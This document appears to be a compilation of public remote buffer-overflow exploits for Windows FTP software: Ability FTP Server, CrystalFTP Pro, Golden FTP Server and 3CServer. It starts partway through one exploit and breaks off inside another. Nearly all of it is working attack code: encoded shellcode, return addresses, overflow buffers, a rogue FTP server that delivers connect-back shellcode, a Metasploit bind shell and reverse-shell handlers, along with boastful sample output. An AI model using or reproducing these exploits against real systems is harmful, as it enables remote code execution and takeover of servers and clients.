"\xE8\x44\x6B\xE3\x32\xF8\xFB\x32\xF8\x87\x32\xF8\x 83\x7C\xF8"
"\x97\xBA\xBA\xBB\xBB\x36\x3E\x83\xBB\xBB\xBB\xEB\x EC\x44\x6D"
"\xE8\xE8\x8A\x72\xEA\xEA\xEA\xD3\xBA\xBB\xBB\xBB\x EA\xEA\x36"
"\x26\x04\xBB\xBB\xBB\xE8\xEA\x44\x6B\x36\x3E\xA7\x BB\xBB\xBB"
"\xEB\xEC\x44\x6D\x44\x6B\x53\x34\x45\x44\x44\xFC\x DE\xCF\xEB"
"\xC9\xD4\xD8\xFA\xDF\xDF\xC9\xDE\xC8\xC8\xBB\xF7\x D4\xDA\xDF"
"\xF7\xD2\xD9\xC9\xDA\xC9\xC2\xFA\xBB\xFE\xC3\xD2\x CF\xEB\xC9"
"\xD4\xD8\xDE\xC8\xC8\xBB\xFC\xDE\xCF\xE8\xCF\xDA\x C9\xCF\xCE"
"\xCB\xF2\xD5\xDD\xD4\xFA\xBB\xF8\xC9\xDE\xDA\xCF\x DE\xEB\xC9"
"\xD4\xD8\xDE\xC8\xC8\xFA\xBB\xFC\xD7\xD4\xD9\xDA\x D7\xFA\xD7"
"\xD7\xD4\xD8\xBB\xCC\xC8\x89\xE4\x88\x89\xBB\xEC\x E8\xFA\xE8"
"\xCF\xDA\xC9\xCF\xCE\xCB\xBB\xEC\xE8\xFA\xE8\xD4\x D8\xD0\xDE"
"\xCF\xFA\xBB\xD9\xD2\xD5\xDF\xBB\xD7\xD2\xC8\xCF\x DE\xD5\xBB"
"\xDA\xD8\xD8\xDE\xCB\xCF\xBB\xB9\xBB\x54\xAB\xBB\x BB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBA\xBB\xBB\xBB\x BB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\x BB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\x BB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xD8\xD6\xDF\xBB\x6D\x 30\x30\x21";
int conn(char *host, u_short port)
{
int sock = 0;
struct hostent *hp;
WSADATA wsa;
struct sockaddr_in sa;
WSAStartup(MAKEWORD(2,0), &wsa);
memset(&sa, 0, sizeof(sa));
hp = gethostbyname(host);
if (hp == NULL) {
printf("gethostbyname() error!\n"); exit(0);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **) hp->h_addr_list);
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) {
printf("socket\n");
exit(0);
}
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
{printf("connect() error!\n");
exit(0);
}
printf("connected to %s\n", host);
return sock;
}
void login(int sock, char *login, char *pass)
{
FILE *file;
char ubuf[1000], pbuf[1000], rc[200];
int i;
char bochka[2000], med[2000];
file = fopen("bochka.txt", "w+");
memset(bochka, 0x00, 2000);
memset(bochka, 0x43, 1000);
*(long*)&bochka[969] = 0x77F5801C; // ntdll.dll JMP ESP ADDR...
memcpy(bochka+strlen(bochka), &shellcode, sizeof(shellcode));
sprintf(med, "APPE %s\r\n", bochka);
fprintf(file, "%s", med);
if ( strlen(pass) >= 100 ) { printf("2 long password!\n"); exit(0); }
if ( strlen(login) >= 100 ) { printf("2 long login!\n"); exit(0); }
sprintf(ubuf, "USER %s\r\n", login);
send(sock, ubuf, strlen(ubuf), 0);
printf("USER sending...\n");
Sleep(1000);
printf("OK!\n");
sprintf(pbuf, "PASS %s\r\n", pass);
send(sock, pbuf, strlen(pbuf), 0);
printf("PASS sending...\n");
Sleep(1000);
recv(sock, rc, 200, 0);
if ( strstr(rc, "530")) {printf("Bad password!\n"); exit(0); }
printf("OK!\n");
Sleep(1000);
printf("Sending 604KY C MEDOM!\n");
send(sock, med, strlen(med), 0);
Sleep(1000);
printf("TrY To CoNnEcT tO...\n\n");
}
int main(int argc, char **argv)
{
int sock = 0;
int data;
printf("\nAbility FTP Server <= 2.34 R00T exploit\n");
printf("by Dark Eagle [ unl0ck team ]\nhttp://unl0ck.void.ru\n\n");
if ( argc < 4 ) { printf("usage: un-aftp.exe <host> <username> <password>\n\n"); exit(0); }
sock = conn(argv[1], 21);
login(sock, argv[2], argv[3]);
closesocket(sock);
Sleep(2000);
return 0;
}
//Reference:
//2004-10-23
//Ability Server 2.34 and below Remote APPE Buffer Overflow Exploit
//KaGra
//http://www.enigmagroup.org/id.php?id=592
// [2004-12-16]
21 CrystalFTP Pro 2.8 Remote Buffer Overflow Exploit
/*
* CrystalFTP Pro v2.8 Buffer Overflow Exploit
*
* 04/25/2005
*
* despite the fact that nobody uses CrystalFTP
* i had to release a new version that replaces
* the first one.
*
* this overwrites the structured exception handler
* with a "pop edx pop eax ret" in kernel32.dll.
* this takes us to a pointer of the next SEH.
* just jmp over the SEH itself and reverse code
* gets executed.
*
* add more targets if needed
*
* have phun
*
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ local IP: 192.168.2.102
* --[ incomming connection from: 192.168.2.103
* --[ sending welcome message...done!
* --[ getting login information
* --[ reading USER...done!
* --[ reading PASS...done!
* USER LOGGED IN!
* --[ proceeding...
* --[ reading cmd...done!
* --[ reading cmd...done!
* --[ reading cmd...done!
* --[ entering passive mode...
* --[ passive connection established!
* --[ reading cmd...done!
* --[ user is trying to use "LIST" command
* --[ w00d w00d, let`s kick his ass...
* --[ sending packet [ 711 bytes ]...done!
* --[ confirming...done!
* --[ starting reverse handler [port: 1337]...done!
* --[ incomming connection from: 192.168.2.103
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\crystalFTP>
*
*/
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
/*
*
* definitions
*
*/
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
#define PORT 21
#define PASV 31337
#define BACKLOG 5
/*
*
* prototypes
*
*/
int isip ( char* ip );
int shell ( int s, char* tip, unsigned short cbport );
char* get_cmd ( int s );
void auth ( int s );
void handle_cmd ( int s, int connfd, char* ip );
void header ();
void start_reverse_handler ();
/*********************
* Windows Shellcode *
*********************/
/*
* Type : connect back shellcode
* Length: 316 bytes
* CBIP : reverseshell[111] ( ^ 0x99999999 )
* CBPort: reverseshell[118] ( ^ 0x9999 )
*
*/
unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x 0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\x C6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x 91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x 99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x 1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x 99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x 12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\x C8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\x A9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x 89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\x BD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\x EF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x 66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x 4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x 96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x 86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x 9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x 17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x 52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
unsigned char head[] =
"\x2d\x72\x77\x2d\x72\x2d\x2d\x72\x2d\x2d\x20\x20\x 20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x 20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x32\x39\x20\x44\x 65\x63\x20\x32"
"\x32\x20\x31\x33\x3a\x33\x37\x20\x63\x79\x62\x65\x 72\x74\x72\x6f"
"\x6e\x69\x63\x2e";
char* argv3 = NULL;
/*
*
* functions
*
*/
int
isip ( char* ip )
{
unsigned int a, b, c, d;
sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d );
if ( a < 1 || a > 255 )
return ( 1 );
if ( b < 0 || b > 255 )
return ( 1 );
if ( c < 0 || c > 255 )
return ( 1 );
if ( d < 0 || d > 255 )
return ( 1 );
return ( 0 );
}
int
shell ( int s, char* tip, unsigned short cbport )
{
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
usleep(10);
}
}
char*
get_cmd ( int s )
{
static char cmd[32];
printf ( "--[" YELLOW " reading cmd..." NORMAL );
if ( read ( s, cmd, 32 ) <= 0 )
{
printf ( RED "failed!\n" NORMAL);
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL );
return ( cmd );
}
void
auth ( int s )
{
char user[32], pass[32], out[128];
printf ( "--[ sending welcome message..." );
bzero ( &out, 128 );
strcpy ( out, "220 cybertronicFTP v0.2\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL );
printf ( "--[ getting login information\n" );
printf ( "--[" YELLOW " reading USER..." NORMAL );
sleep ( 1 );
if ( read ( s, user, 32 ) <= 0 )
{
printf ( RED "failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL );
sleep ( 1 );
bzero ( &out, 128 );
strcpy ( out, "331 Anonymous FTP server\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( "--[" YELLOW " reading PASS..." NORMAL );
sleep ( 1 );
if ( read ( s, pass, 32 ) <= 0 )
{
printf ( RED "failed\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL );
sleep ( 1 );
bzero ( &out, 128 );
strcpy ( out, "230 Login successful!\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "\tUSER LOGGED IN!\n" NORMAL );
printf ( "--[ proceeding...\n" );
}
void
handle_cmd ( int s, int s2, char* ip )
{
int listenfd, connfd;
int i = 1;
int tmp[4];
unsigned long ret = 0x77ea5794; //edx eax ret in kernel32.dll
char* a = NULL;
char* cmd;
char out[128], buffer[1024], addr[32];
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
while ( 1 )
{
cmd = get_cmd ( s );
if ( strncmp ( cmd, "PWD", 3 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "257 \"/\" is current directory.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "CWD", 3 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "257 \"/\" is current directory.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "TYPE", 4 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "200 Type set to A..\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "PASV", 4 ) == 0 )
{
bzero ( &addr, 32 );
a = ( char* ) strtok ( ip, "." );
tmp[0] = ( int ) a;
while ( a != NULL )
{
a = ( char* ) strtok ( NULL, "." );
tmp[i] = ( int )a;
i++;
}
bzero ( &out, 128 );
sprintf( out, "227 Entering Passive Mode. (%s,%s,%s,%s,122,105).\r\n", tmp[0], tmp[1], tmp[2], tmp[3] );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( "--[ entering passive mode...\n" );
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "socket failed!\n" NORMAL );
exit ( 1 );
}
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PASV );
bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( listenfd, 1 ) == -1 )
{
printf ( RED "listen failed!\n" NORMAL );
exit ( 1 );
}
clilen = sizeof ( cliaddr );
if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
close ( listenfd );
printf ( RED "accept failed!\n" NORMAL );
exit ( 1 );
}
close ( listenfd );
printf ( "--[" GREEN " passive connection established!\n" NORMAL );
handle_cmd ( s, connfd, addr );
}
else if ( strncmp ( cmd, "LIST", 4 ) == 0 )
{
printf ( "--[" GREEN " user is trying to use \"LIST\" command\n" NORMAL );
printf ( "--[ w00d w00d, let`s kick his ass...\n" );
bzero ( &buffer, 1024 );
memcpy ( buffer, head, sizeof ( head ) - 1 );
memset ( buffer + 68, 0x90, 255 );
memcpy ( buffer + 321, "\xeb\x46", 2 );
strncat ( buffer, ( unsigned char * ) &ret, 4 );
memset ( buffer + 327, 0x90, 66 );
memcpy ( buffer + 393, reverseshell, sizeof ( reverseshell ) - 1 );
strcat ( buffer, "\r\n" );
bzero ( &out, 128 );
strcpy ( out, "150 Here comes the directory listing.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( "--[ sending packet [ %d bytes ]...", strlen ( buffer ) );
if ( write ( s2, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL);
bzero ( &out, 128 );
strcpy ( out, "226 Transfer ok\r\n" );
printf ( "--[ confirming..." );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL);
close ( s2 );
start_reverse_handler ( argv3 );
}
else
{
bzero ( &out, 128 );
strcpy ( out, "550 command not supported\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
}
}
void
header ()
{
printf ( " __ __ _ \n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
printf ( " /____/ \n\n" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
}
void
start_reverse_handler ()
{
int s1, s2;
unsigned short cbport;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );
sscanf ( argv3, "%u", &cbport );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );
printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!\n" );
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!\n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[" GREEN " incomming connection from:\t" YELLOW " %s\n" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
close ( s2 );
}
int
main ( int argc, char* argv[] )
{
int listenfd, connfd;
unsigned long xoredip;
unsigned short xoredcbport;
char* ip;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
if ( argc != 3 )
{
printf ( RED "--[ usage: %s <connectback ip> <connectback port>\n" NORMAL, argv[0] );
exit ( 1 );
}
if ( isip ( argv[1] ) != 0 )
{
printf ( RED "--[ enter a valid IP\n" NORMAL );
exit ( 1 );
}
system ( "clear" );
header ();
argv3 = argv[2];
xoredip = inet_addr ( argv[1] ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( atoi ( argv[2] ) ) ^ ( unsigned short ) 0x9999;
memcpy ( &reverseshell[111], &xoredip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "socket failed!\n" NORMAL );
exit ( 1 );
}
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );
bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( listenfd, BACKLOG ) == -1 )
{
printf ( RED "listen failed!\n" NORMAL );
exit ( 1 );
}
for ( ; ; )
{
clilen = sizeof ( cliaddr );
if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
close ( listenfd );
printf ( RED "accept failed!\n" NORMAL );
exit ( 1 );
}
if ( ( childpid = fork ( ) ) == 0 )
{
close ( listenfd );
ip = ( char* ) ( argv[1] );
printf ( "--[ local IP: %s\n", ip );
printf ( "--[" GREEN " incomming connection from:\t" YELLOW " %s\n" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
auth ( connfd );
handle_cmd ( connfd, ( int ) NULL, ip );
}
close ( connfd );
}
}
// [2005-04-24]
21 Golden FTP Server <= 2.02b Remote Buffer Overflow Exploit
#!/usr/bin/perl -w
# Barabas - www.whitehat.co.il -
# cheers to muts and all peeps at WH.
# XPSP2 goldenftpserver sploit - bind 4444
use strict;
use Net::FTP;
my $payload="\x41"x260;
$payload .="\x65\x82\xa5\x7c";#jmpesp
$payload .="\x90"x32;#not really necessary...blah
# win32_bind - EXITFUNC=seh LPORT=4444 Size=321 Encoder=None http://metasploit.com
$payload .="\xfc\x6a\xeb\x4f\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x 24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x 20\x01\xeb\xe3".
"\x30\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\x c0\x74\x07\xc1".
"\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe3\x 8b\x5f\x24\x01".
"\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x 8b\x89\x6c\x24".
"\x1c\x61\xc3\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x 8b\x70\x1c\xad".
"\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x 31\xdb\x66\x53".
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0\x 68\xcb\xed\xfc".
"\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x 55\x6a\x02\xff".
"\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x 53\x53\x43\x53".
"\x43\x53\xff\xd0\x66\x68\x11\x5c\x66\x53\x89\xe1\x 95\x68\xa4\x1a".
"\x70\xc7\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x68\x a4\xad\x2e\xe9".
"\x57\xff\xd6\x53\x55\xff\xd0\x68\xe5\x49\x86\x49\x 57\xff\xd6\x50".
"\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57\x ff\xd6\x55\xff".
"\xd0\x66\x6a\x64\x66\x68\x63\x6d\x89\xe5\x6a\x50\x 59\x29\xcc\x89".
"\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\x fe\x42\x2c\x93".
"\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x 75\x44\xff\xd6".
"\x5b\x57\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\x ff\xd0\x68\xad".
"\xd9\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x 8b\x57\xfc\x83".
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x 53\xff\xd6\xff".
"\xd0";
my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
$ftp->login("ftp","ftp");
$ftp->quot("RNTO",$payload);
# [2005-01-22]
21 3CServer 1.1 FTP Server Remote Exploit
/*
subject: Proof of Concept exploit for 3CServer v1.1 FTP server
vendor: 3Com, http://support.3com.com/software/utilities_for_windows_32_bit.htm
`date`: Mon Feb 7 18:10:01 2005
notes: universal offset, SEH ptr overwriting with variation
author: mandragore, mandragore@[email protected]
*/
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define NORM "\033[00;00m"
#define GREEN "\033[01;32m"
#define YELL "\033[01;33m"
#define RED "\033[01;31m"
#define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.0 for " RED "3CServer v1.1.007" NORM
#define fatal(x) { perror(x); exit(1); }
#define default_port 21
#define default_user "anonymous"
#define default_pass "[email protected]"
#define GPA 0x0045b968
#define LLA 0x0045b964
#define offset 0x418A19 // call eax
unsigned char bsh[]={
// 198 bytes, iat's gpa at 0x1a, iat's lla at 0x2b, port at 0x46 (1180), key 0xde
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB0, 0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0x57,0xD7,0x60, 0xDE,0xFE,0x9E,0xDE,0xB6,0xED,
0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21, 0xCB,0xDA,0xFE,0x9E,0xDE,0x49,
0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0xB4, 0x90,0x89,0x21,0xC8,0x21,0x0E,
0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xDA,0x42,0x55,0x1A, 0xB4,0xCE,0x8E,0x8D,0xB4,0xDC,
0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,0x8D,0xB4,0xD3, 0x89,0x21,0xC8,0x21,0x0E,0xB4,
0xDE,0x8A,0x8D,0xB4,0xDF,0x89,0x21,0xC8,0x21,0x0E, 0x55,0x06,0xED,0x1E,0xB4,0xCE,
0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55, 0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,
0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3, 0xBA,0xDE,0x8E,0x36,0xD1,0xDE,
0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC, 0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,
0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE, 0xDE,0x5D,0x19,0xE6,0x4D,0x75,
0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2, 0x55,0x9E,0xC2,0x55,0xDE,0x21,
0xAE,0xD6,0x21,0xC8,0x21,0x0E
};
char verbose=0;
static void start(void) __attribute__ ((constructor));
void start() {
int gpa=GPA^0xdededede, lla=LLA^0xdededede;
memcpy(bsh+0x1a,&gpa,4);
memcpy(bsh+0x2b,&lla,4);
}
int readcrap(int s) {
struct timeval tv;
fd_set fds;
int ret;
char buff[1024];
FD_ZERO(&fds);
FD_SET(s,&fds);
bzero(buff,sizeof(buff));
while (1) {
tv.tv_sec=1;
tv.tv_usec=0;
if ( ret=select(s+1, &fds, NULL, NULL, (struct timeval *)&tv) < 0 )
break;
if (FD_ISSET(s,&fds)) {
// something to read
if ( read(s,buff,sizeof(buff),0) < 1 )
break;
} else {
// timeout
return 1;
}
}
return 0; // something went bad
}
void usage(char *argv0) {
int i;
printf("%s -d <host/ip> [opts]\n\n",argv0);
printf("Options:\n");
printf(" -h undocumented\n");
printf(" -u user [default: " default_user "]\n");
printf(" -p pass [default: " default_pass "]\n");
printf(" -P <port> for the shellcode [default: 1180]\n");
exit(1);
}
void shell(int s) {
char buff[4096];
int retval;
fd_set fds;
printf("[+] connected!\n\n");
for (;;) {
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(s,&fds);
if (select(s+1, &fds, NULL, NULL, NULL) < 0)
fatal("[-] shell.select()");
if (FD_ISSET(0,&fds)) {
if ((retval = read(1,buff,4096)) < 1)
fatal("[-] shell.recv(stdin)");
send(s,buff,retval,0);
}
if (FD_ISSET(s,&fds)) {
if ((retval = recv(s,buff,4096,0)) < 1)
fatal("[-] shell.recv(socket)");
write(1,buff,retval);
}
}
}
int main(int argc, char **argv, char **env) {
struct sockaddr_in sin;
struct hostent *he;
char *host; int port=default_port;
char *Host; int Port=1180; char bindopt=1;
int i,s;
char *buff, *jmpback="\xe9\x35\xff\xff\xff";
char *user=default_user; char *pass=default_pass;
printf(BANNER "\n");
if (argc==1)
usage(argv[0]);
for (i=1;i<argc;i+=2) {
if (strlen(argv[i]) != 2)
usage(argv[0]);
switch(argv[i][1]) {
case 'd':
host=argv[i+1];
break;
case 'u':
user=argv[i+1];
break;
case 'p':
pass=argv[i+1];
break;
case 'P':
Port=atoi(argv[i+1])?:1180;
Port=Port ^ 0xdede;
Port=(Port & 0xff) << 8 | Port >>8;
memcpy(bsh+0x46,&Port,2);
Port=Port ^ 0xdede;
Port=(Port & 0xff) << 8 | Port >>8;
break;
case 'v':
verbose++; i--;
break;
case 'h':
usage(argv[0]);
default:
usage(argv[0]);
}
}
if (verbose)
printf("verbose!\n");
if ((he=gethostbyname(host))==NULL)
fatal("[-] gethostbyname()");
sin.sin_family = 2;
sin.sin_addr = *((struct in_addr *)he->h_addr_list[0]);
sin.sin_port = htons(port);
printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port);
printf("[.] will try to put a bindshell on port %d.\n",Port);
// -------------------- core
s=socket(2,1,6);
